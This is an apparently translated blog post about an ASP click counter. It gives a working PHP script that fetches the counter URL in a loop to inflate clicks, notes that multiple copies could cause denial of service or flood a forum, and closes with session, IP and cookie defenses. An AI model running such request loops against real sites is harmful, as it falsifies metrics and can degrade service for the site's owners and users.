Today I accidentally saw a website whose counter can be updated in a static page. I thought it should be done using js. When I opened the source code, it turned out to be:
<div align=center><SPAN class=Article_tdbgall>
Author: Unknown Article Source: Meidi.Net
Number of clicks:
<script language='javascript' src='/Article/GetHits.asp?ArticleID=759'></script>
Update time: 2005-5-27</SPAN>
</div>
The number of clicks is followed by an asp file for processing, so I will open this file and take a look:
document.write('210');
Right, it is the GetHists.asp file that processes ArticleID and extracts the results and outputs the number of times: document .write('number of times'), which can be directly referenced in the static page.
Bad guys are bad guys after all, so I thought, how can I quickly increase the number of clicks? Manual refresh is not very useful. Well, quickly write a PHP program to automatically access this file.
The PHP code is as follows:
<?php
/* access_url.php */
define(SUM, 1000); //Number of visits required
define(L_TIME, 1000); //Force script execution time
define(S_TIME, 1); //Sleep time between each visit
$url = " http://www.xxx.com/Article/GetHits.asp?ArticleID=759 "; //The address to be accessed
set_time_limit(L_TIME);
//Access the specified URL function knowsky.com
function access_url($url)
{
if ($url=='') return false;
$fp = fopen($url, 'r') or exit('Open url faild!');
if ($fp) {
while (!feof($fp)) {
$file = fgets($fp);
echo $file."n<p> </p>n";
}
unset($file);
}
}
//Test
for ($i=0; $i<SUM; $i++) {
access_url($url);
sleep(S_TIME);
}
?>
Run the above program, then the specified URL address will be accessed continuously, and naturally the number of accesses will continue to increase, achieving the effect of flooding. If the traffic is large and multiple programs are used to run it, it is easy to achieve a denial of service (DoS) effect. If the other party takes preventive measures and modifies the code and submits it to the forum, it is easy to achieve the effect of flooding the forum.
Prevention methods:
1. Use the Session mechanism in the code. When the user submits, a Session ID is generated. When submitting the content, it is judged whether it has been submitted. If it has been submitted, brushing is not allowed.
2. After the user submits, the user's IP address is recorded. If the user submits again within the specified time, no further submission is allowed.
3. After the user submits the content, a cookie is written on the user's client. If the user submits again, check whether there is a cookie on the client to determine whether the submission is allowed.
There are many other ways, you can search for them, or use your imagination to do better.